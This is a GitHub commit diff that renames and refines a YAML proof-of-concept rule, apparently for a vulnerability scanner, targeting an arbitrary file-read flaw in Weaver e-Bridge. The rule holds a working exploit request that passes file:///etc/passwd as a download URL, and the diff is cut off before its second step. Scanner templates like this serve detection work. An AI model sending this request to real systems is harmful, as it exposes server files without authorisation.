Skip to content

Commit

Permalink
Update and rename weaver-e-bridge-linux-file-read.yml to weaver-ebrid…
Browse files Browse the repository at this point in the history
…ge-file-read-linux.yml
  • Loading branch information
zema1 authored Sep 13, 2020
1 parent bd99c6c commit fcd97c7
Showing 1 changed file with 2 additions and 2 deletions.
Original file line number Diff line number Diff line change
@@ -1,10 +1,10 @@
name: poc-yaml-weaver-e-bridge-linux-file-read
name: poc-yaml-weaver-ebridge-file-read-linux
rules:
- method: GET
path: "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt"
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"id")
response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"id")
search: |
\"id\"\:\"(?P<var>.+?)\"\,
- method: GET
Expand Down

0 comments on commit fcd97c7

Please sign in to comment.